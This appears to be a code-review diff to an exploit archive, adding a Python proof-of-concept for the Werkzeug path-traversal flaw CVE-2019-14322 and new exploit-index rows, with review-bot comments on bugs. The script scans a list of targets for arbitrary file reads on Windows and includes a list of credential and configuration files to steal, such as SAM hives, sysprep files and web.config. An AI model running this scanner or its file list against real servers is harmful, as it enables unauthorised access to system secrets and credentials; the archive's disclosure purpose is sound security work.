@@ -0,0 +1,128 @@ +# Exploit Title: Pallets Werkzeug 0.15.4 - Path Traversal +# Date: 06 July 2021 +# Original Author: Emre ÖVÜNÇ +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://palletsprojects.com/ +# Software Link: https://github.com/pallets/werkzeug +# Version: Prior to 0.15.5 +# Tested on: Windows Server +# CVE: 2019-14322 +# Credit: Emre Övünç and Olivier Dony for responsibly reporting the issue +# CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-14322 +# Reference : https://palletsprojects.com/blog/werkzeug-0-15-5-released/ + +Description : Prior to 0.15.5, it was possible for a third party to potentially access arbitrary files when the application used SharedDataMiddleware on Windows. Due to the way Python's os.path.join() function works on Windows, a path segment with a drive name will change the drive of the final path. TLDR; In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames lead to arbitrary file download. 
+ +#!/usr/bin/env python3 +# PoC code by @faisalfs10x [https://github.com/faisalfs10x] + +""" $ pip3 install colorama==0.3.3, argparse, requests, urllib3 + $ python3 CVE-2019-14322.py -l list_target.txt" +""" +import argparse +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) +import requests +from colorama import Fore, Back, Style, init + +# Colors +red = '\033[91m' +green = '\033[92m' +white = '\033[97m' +yellow = '\033[93m' +bold = '\033[1m' +end = '\033[0m' + +init(autoreset=True) + +def banner_motd(): + print(Fore.CYAN +Style.BRIGHT +""" + + CVE-2019-14322 %sPoC by faisalfs10x%s - (%s-%s)%s %s +""" % (bold, red, white, yellow, white, end)) + +banner_motd() + +# list of sensitive files to grab in windows + +# %windir%\repair\sam +# %windir%\System32\config\RegBack\SAM +# %windir%\repair\system +# %windir%\repair\software +# %windir%\repair\security +# %windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account) +# %windir%\iis6.log (5,6 or 7) +# %windir%\system32\logfiles\httperr\httperr1.log +# C:\sysprep.inf +# C:\sysprep\sysprep.inf +# C:\sysprep\sysprep.xml +# %windir%\Panther\Unattended.xml +# C:\inetpub\wwwroot\Web.config +# %windir%\system32\config\AppEvent.Evt (Application log) +# %windir%\system32\config\SecEvent.Evt (Security log) +# %windir%\system32\config\default.sav +# %windir%\system32\config\security.sav +# %windir%\system32\config\software.sav +# %windir%\system32\config\system.sav +# %windir%\system32\inetsrv\config\applicationHost.config +# %windir%\system32\inetsrv\config\schema\ASPNET_schema.xml +# %windir%\System32\drivers\etc\hosts (dns entries) +# %windir%\System32\drivers\etc\networks (network settings) +# %windir%\system32\config\SAM +# TLDR: +# C:/windows/system32/inetsrv/config/schema/ASPNET_schema.xml +# C:/windows/system32/inetsrv/config/applicationHost.config +# C:/windows/system32/logfiles/httperr/httperr1.log +# C:/windows/debug/NetSetup.log - (may contain AD domain name, DC 
name, internal IP, DA account) +# C:/windows/system32/drivers/etc/hosts - (dns entries) +# C:/windows/system32/drivers/etc/networks - (network settings) + +def check(url): + + # There are 3 endpoints to be tested by default, but to avoid noisy, just pick one :) + for endpoint in [ + 'https://{}/base_import/static/c:/windows/win.ini', + #'https://{}/web/static/c:/windows/win.ini', + #'https://{}/base/static/c:/windows/win.ini' + ]: + try: + + url2 = endpoint.format(url) + resp = requests.get(url2, verify=False, timeout=5) + + if 'fonts' and 'files' and 'extensions' in resp.text: + print(Fore.LIGHTGREEN_EX +Style.BRIGHT +" [+] " +url2+ " : vulnerable====[+]") + with open('CVE-2019-14322_result.txt', 'a+') as output: + output.write('{}\n'.format(url2)) + output.close() + + else: + print(" [-] " +url+ " : not vulnerable") + + except KeyboardInterrupt: + exit('User aborted!') + except: + print(" [-] " +url+ " : not vulnerable") + + +def main(args): + + f = open(listfile, "r") + for w in f: + url = w.strip() + + check(url) + +if __name__ == '__main__': + + try: + + parser = argparse.ArgumentParser(description='CVE-2019-14322') + parser.add_argument("-l","--targetlist",required=True, help = "target list in file") + args = parser.parse_args() + listfile = args.targetlist + + main(args) + + except KeyboardInterrupt: + exit('User aborted!') \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2ee3f0b55..6c51ad110 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
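Review bot: The vulnerability check `if 'fonts' and 'files' and 'extensions' in resp.text:` tests only the last operand — the two string literals are truthy on their own — so any response containing the word "extensions" is reported vulnerable; use `if all(k in resp.text for k in ('fonts', 'files', 'extensions')):`. The bare `except:` then prints "not vulnerable" for timeouts and connection errors, conflating unreachable hosts with patched ones; catch `requests.RequestException as e` and report `" [-] " + url + " : unreachable (" + str(e) + ")"`. The three probe paths (`/base_import/static/`, `/web/static/`, `/base/static/`) look like module routes of one specific Werkzeug-based application rather than a property of `SharedDataMiddleware` itself, which the description should state so the scanner is not mistaken for a generic Werkzeug check. `main()` also ignores its `args` parameter in favour of the global `listfile` and never closes the list file; `with open(args.targetlist) as f:` fixes both.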
@@ -44204,7 +44204,7 @@ id,file,description,date,author,type,platform,port
 50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-24,CHackA0101,webapps,multiple,
 50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",2021-06-24,Pergyz,webapps,cfm,
 50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",2021-06-24,"Koh You Liang",webapps,hardware,
-50059,exploits/hardware/webapps/50059.txt,"Huawei dg8045 - Authentication Bypass",2021-06-24,"Abdalrahman Gamal",webapps,hardware,
+50107,exploits/php/webapps/50107.py,"WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal",2021-07-06,TheSmuggler,webapps,php,
 50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,
 50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php,
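Review bot: The new `50107` row is dropped into the slot of the removed `50059` row, between 50058 and 50063, so the index is no longer in ascending id order; it belongs after the `50106` row added in the next hunk. The `50059` entry disappears together with its file without any stated reason (retraction, duplicate, vendor request), which is worth a line in the commit message since consumers of this CSV will see an id vanish.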
@@ -44235,3 +44235,13 @@ id,file,description,date,author,type,platform,port
 50094,exploits/php/webapps/50094.py,"Simple Client Management System 1.0 - Remote Code Execution (RCE)",2021-07-05,"Ishan Saha",webapps,php,
 50095,exploits/php/webapps/50095.py,"TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)",2021-07-05,"Mevlüt Akçam",webapps,php,
 50096,exploits/hardware/webapps/50096.py,"Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE)",2021-07-05,LiquidWorm,webapps,hardware,
+50097,exploits/multiple/webapps/50097.txt,"perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)",2021-07-06,"Alhasan Abbas",webapps,multiple,
+50098,exploits/multiple/webapps/50098.txt,"Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)",2021-07-06,"Andrea D\'Ubaldo",webapps,multiple,
+50099,exploits/hardware/webapps/50099.py,"Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)",2021-07-06,SivertPL,webapps,hardware,
+50100,exploits/hardware/webapps/50100.py,"Black Box Kvm Extender 3.4.31307 - Local File Inclusion",2021-07-06,"Ferhat Çil",webapps,hardware,
+50101,exploits/python/webapps/50101.py,"Pallets Werkzeug 0.15.4 - Path Traversal",2021-07-06,faisalfs10x,webapps,python,
+50102,exploits/php/webapps/50102.py,"Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-07-06,"Talha DEMİRSOY",webapps,php,
+50103,exploits/php/webapps/50103.php,"Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)",2021-07-06,"Thamer Almohammadi",webapps,php,
+50104,exploits/hardware/webapps/50104.txt,"Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation",2021-07-06,"Andrea D\'Ubaldo",webapps,hardware,
+50105,exploits/php/webapps/50105.txt,"Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi)",2021-07-06,faisalfs10x,webapps,php,
+50106,exploits/php/webapps/50106.txt,"Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code 
Execution",2021-07-06,faisalfs10x,webapps,php,
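Review bot: The author field `"Andrea D\'Ubaldo"` in the 50098 and 50104 rows uses a backslash escape that CSV does not define, so the name is read literally with the backslash; inside a double-quoted field an apostrophe needs no escaping, so write `"Andrea D'Ubaldo"`. The two Visual Tools VX16 entries are also classified inconsistently — 50098 under platform `multiple`, 50104 under `hardware` — and 50104 is a local sudo privilege escalation yet is filed as type `webapps`; the type and platform should match the content and agree between the two rows.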